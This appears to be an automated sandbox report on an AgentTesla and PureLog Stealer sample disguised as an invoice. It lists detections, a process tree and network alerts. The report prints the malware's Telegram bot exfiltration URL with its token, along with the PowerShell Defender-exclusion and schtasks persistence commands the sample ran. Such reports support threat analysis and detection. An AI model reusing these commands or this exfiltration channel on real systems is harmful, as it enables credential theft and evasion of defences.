Edit tour

Windows Analysis Report
proforma invoice pdf.exe

Overview

General Information

Sample name:	proforma invoice pdf.exe
Analysis ID:	1585873
MD5:	b67477603738159b912b0aa9c197897f
SHA1:	51a14b917e8393a3c1ded172bb04c494fdd727e3
SHA256:	67cc97b2f5e9d35039589c92c7f6fda7831af0f259ddf248fb166664e4027b91
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to register a low level keyboard hook

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

proforma invoice pdf.exe (PID: 2908 cmdline: "C:\Users\user\Desktop\proforma invoice pdf.exe" MD5: B67477603738159B912B0AA9C197897F)

powershell.exe (PID: 5436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2564 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6900 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

proforma invoice pdf.exe (PID: 4092 cmdline: "C:\Users\user\Desktop\proforma invoice pdf.exe" MD5: B67477603738159B912B0AA9C197897F)

proforma invoice pdf.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\proforma invoice pdf.exe" MD5: B67477603738159B912B0AA9C197897F)

wTyVrj.exe (PID: 6668 cmdline: C:\Users\user\AppData\Roaming\wTyVrj.exe MD5: B67477603738159B912B0AA9C197897F)

schtasks.exe (PID: 4580 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wTyVrj.exe (PID: 4788 cmdline: "C:\Users\user\AppData\Roaming\wTyVrj.exe" MD5: B67477603738159B912B0AA9C197897F)

wTyVrj.exe (PID: 3736 cmdline: "C:\Users\user\AppData\Roaming\wTyVrj.exe" MD5: B67477603738159B912B0AA9C197897F)

bmBOz.exe (PID: 5528 cmdline: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" MD5: B67477603738159B912B0AA9C197897F)

schtasks.exe (PID: 2644 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp6D52.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bmBOz.exe (PID: 4564 cmdline: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" MD5: B67477603738159B912B0AA9C197897F)

bmBOz.exe (PID: 4428 cmdline: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" MD5: B67477603738159B912B0AA9C197897F)

schtasks.exe (PID: 6672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp889B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

bmBOz.exe (PID: 4516 cmdline: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" MD5: B67477603738159B912B0AA9C197897F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendMessage?chat_id=1279485009"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1485785699.00000000072A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1482009308.0000000003E59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Process Memory Space: proforma invoice pdf.exe PID: 2608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: proforma invoice pdf.exe PID: 2608	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: proforma invoice pdf.exe PID: 2608	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: wTyVrj.exe PID: 6668	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: wTyVrj.exe PID: 3736	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wTyVrj.exe PID: 3736	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wTyVrj.exe PID: 3736	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: bmBOz.exe PID: 5528	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: bmBOz.exe PID: 4564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bmBOz.exe PID: 4564	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: bmBOz.exe PID: 4564	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: bmBOz.exe PID: 4428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: bmBOz.exe PID: 4516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: bmBOz.exe PID: 4516	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: bmBOz.exe PID: 4516	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.proforma invoice pdf.exe.3e83d90.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.proforma invoice pdf.exe.72a0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proforma invoice pdf.exe.3e59970.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.proforma invoice pdf.exe.3e83d90.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\proforma invoice pdf.exe, ProcessId: 2608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bmBOz

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice pdf.exe", ParentImage: C:\Users\user\Desktop\proforma invoice pdf.exe, ParentProcessId: 2908, ParentProcessName: proforma invoice pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", ProcessId: 5436, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\proforma invoice pdf.exe, ProcessId: 2608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bmBOz

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\wTyVrj.exe, ParentImage: C:\Users\user\AppData\Roaming\wTyVrj.exe, ParentProcessId: 6668, ParentProcessName: wTyVrj.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp", ProcessId: 4580, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice pdf.exe", ParentImage: C:\Users\user\Desktop\proforma invoice pdf.exe, ParentProcessId: 2908, ParentProcessName: proforma invoice pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", ProcessId: 6900, ProcessName: schtasks.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe" , ProcessId: 5528, ProcessName: bmBOz.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice pdf.exe", ParentImage: C:\Users\user\Desktop\proforma invoice pdf.exe, ParentProcessId: 2908, ParentProcessName: proforma invoice pdf.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe", ProcessId: 5436, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\proforma invoice pdf.exe", ParentImage: C:\Users\user\Desktop\proforma invoice pdf.exe, ParentProcessId: 2908, ParentProcessName: proforma invoice pdf.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp", ProcessId: 6900, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:30:36.610034+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:42.511735+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:51.227749+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:58.655456+0100	2851779	1	Malware Command and Control Activity Detected	192.168.2.7	49726	149.154.167.220	443	TCP

ETPRO MALWARE Agent Tesla Telegram Exfil M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:30:36.610034+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:38.027822+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49713	149.154.167.220	443	TCP
2025-01-08T12:30:42.511735+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:44.622122+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49717	149.154.167.220	443	TCP
2025-01-08T12:30:51.227749+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:52.881552+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49724	149.154.167.220	443	TCP
2025-01-08T12:30:58.655456+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49726	149.154.167.220	443	TCP
2025-01-08T12:31:00.416556+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49727	149.154.167.220	443	TCP
2025-01-08T12:32:08.366420+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49729	149.154.167.220	443	TCP
2025-01-08T12:32:17.195920+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49730	149.154.167.220	443	TCP
2025-01-08T12:32:32.738002+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49731	149.154.167.220	443	TCP
2025-01-08T12:33:10.818182+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49732	149.154.167.220	443	TCP
2025-01-08T12:33:12.197930+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49733	149.154.167.220	443	TCP
2025-01-08T12:33:17.302380+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49734	149.154.167.220	443	TCP
2025-01-08T12:33:19.923971+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49735	149.154.167.220	443	TCP
2025-01-08T12:33:22.858764+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49736	149.154.167.220	443	TCP
2025-01-08T12:33:27.484985+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49737	149.154.167.220	443	TCP
2025-01-08T12:34:01.549705+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49738	149.154.167.220	443	TCP
2025-01-08T12:34:09.516088+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49739	149.154.167.220	443	TCP
2025-01-08T12:34:12.455710+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49740	149.154.167.220	443	TCP
2025-01-08T12:34:19.403672+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49741	149.154.167.220	443	TCP
2025-01-08T12:34:32.310694+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49742	149.154.167.220	443	TCP
2025-01-08T12:34:45.354072+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49743	149.154.167.220	443	TCP
2025-01-08T12:34:45.383281+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49744	149.154.167.220	443	TCP
2025-01-08T12:34:45.668495+0100	2852815	1	Malware Command and Control Activity Detected	192.168.2.7	49745	149.154.167.220	443	TCP

ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:30:36.610257+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49711	TCP
2025-01-08T12:30:38.028607+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49713	TCP
2025-01-08T12:30:42.511955+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49716	TCP
2025-01-08T12:30:44.622400+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49717	TCP
2025-01-08T12:30:51.227971+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49722	TCP
2025-01-08T12:30:52.881793+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49724	TCP
2025-01-08T12:30:58.655732+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49726	TCP
2025-01-08T12:31:00.416848+0100	2854281	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.7	49727	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T12:30:36.383757+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49711	149.154.167.220	443	TCP
2025-01-08T12:30:37.609518+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49713	149.154.167.220	443	TCP
2025-01-08T12:30:42.257102+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49716	149.154.167.220	443	TCP
2025-01-08T12:30:44.345635+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49717	149.154.167.220	443	TCP
2025-01-08T12:30:50.978219+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49722	149.154.167.220	443	TCP
2025-01-08T12:30:52.509657+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49724	149.154.167.220	443	TCP
2025-01-08T12:30:58.391306+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49726	149.154.167.220	443	TCP
2025-01-08T12:31:00.149241+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49727	149.154.167.220	443	TCP
2025-01-08T12:32:08.365365+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49729	149.154.167.220	443	TCP
2025-01-08T12:32:17.190035+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49730	149.154.167.220	443	TCP
2025-01-08T12:32:32.737214+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49731	149.154.167.220	443	TCP
2025-01-08T12:33:10.817184+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49732	149.154.167.220	443	TCP
2025-01-08T12:33:12.197242+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49733	149.154.167.220	443	TCP
2025-01-08T12:33:17.301283+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49734	149.154.167.220	443	TCP
2025-01-08T12:33:19.923212+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49735	149.154.167.220	443	TCP
2025-01-08T12:33:22.854116+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49736	149.154.167.220	443	TCP
2025-01-08T12:33:27.481261+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49737	149.154.167.220	443	TCP
2025-01-08T12:34:01.546837+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49738	149.154.167.220	443	TCP
2025-01-08T12:34:09.513094+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49739	149.154.167.220	443	TCP
2025-01-08T12:34:12.280510+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49740	149.154.167.220	443	TCP
2025-01-08T12:34:19.402827+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49741	149.154.167.220	443	TCP
2025-01-08T12:34:32.300227+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49742	149.154.167.220	443	TCP
2025-01-08T12:34:45.353210+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49743	149.154.167.220	443	TCP
2025-01-08T12:34:45.382586+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49744	149.154.167.220	443	TCP
2025-01-08T12:34:45.665977+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49745	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendMessage?chat_id=1279485009"}
Source: wTyVrj.exe.3736.16.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Virustotal: Detection: 33%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	ReversingLabs: Detection: 63%
